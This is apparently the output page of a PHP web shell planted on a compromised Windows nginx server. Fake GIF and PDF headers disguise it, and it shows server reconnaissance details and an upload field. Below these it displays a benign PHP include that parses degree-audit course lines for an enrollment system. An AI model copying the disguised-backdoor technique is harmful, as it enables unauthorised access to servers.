GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Admin/Enrollment/parse/ |
Upload File : |
<? // Admin/Enrollment/parse/parseDARS_47_c.phpinc // Parse state 47 // Parse Ed Plan section. // Searching for: // ['CreditsAdded'] ['CoursesAdded'] #printVar("$index: \$f_DARSln",$f_DARSln); printVar('$f_DARSlnAsize',$f_DARSlnAsize); printVar('$f_DARSlnA',$f_DARSlnA); #exit; if ( !$f_error ) { if ( $f_DARSlnAsize >= 3 && $f_DARSlnA[2] == 'TAKEN' && is_numeric($f_DARSlnA[0]) ) { if ( !isset($f_DARS_has_required_credits) || $f_DARS_has_required_credits ) { $DARS['Section'][$sectionName]['CoursesAdded'] = $f_DARSlnA[0]; #$f_DARS_has_required_credits = true; } else { if ( !isset($DARS['Section'][$sectionName]['CoursesAdded']) ) $DARS['Section'][$sectionName]['CoursesAdded'] = 0; $DARS['Section'][$sectionName]['CoursesAdded'] += $f_DARSlnA[0]; } } else { $f_error = 'This is not a properly formatted COURSES TAKEN line.<span class=\"pv_fl\"> '.basename(__FILE__).':'.__LINE__.'</span>'; } } ?>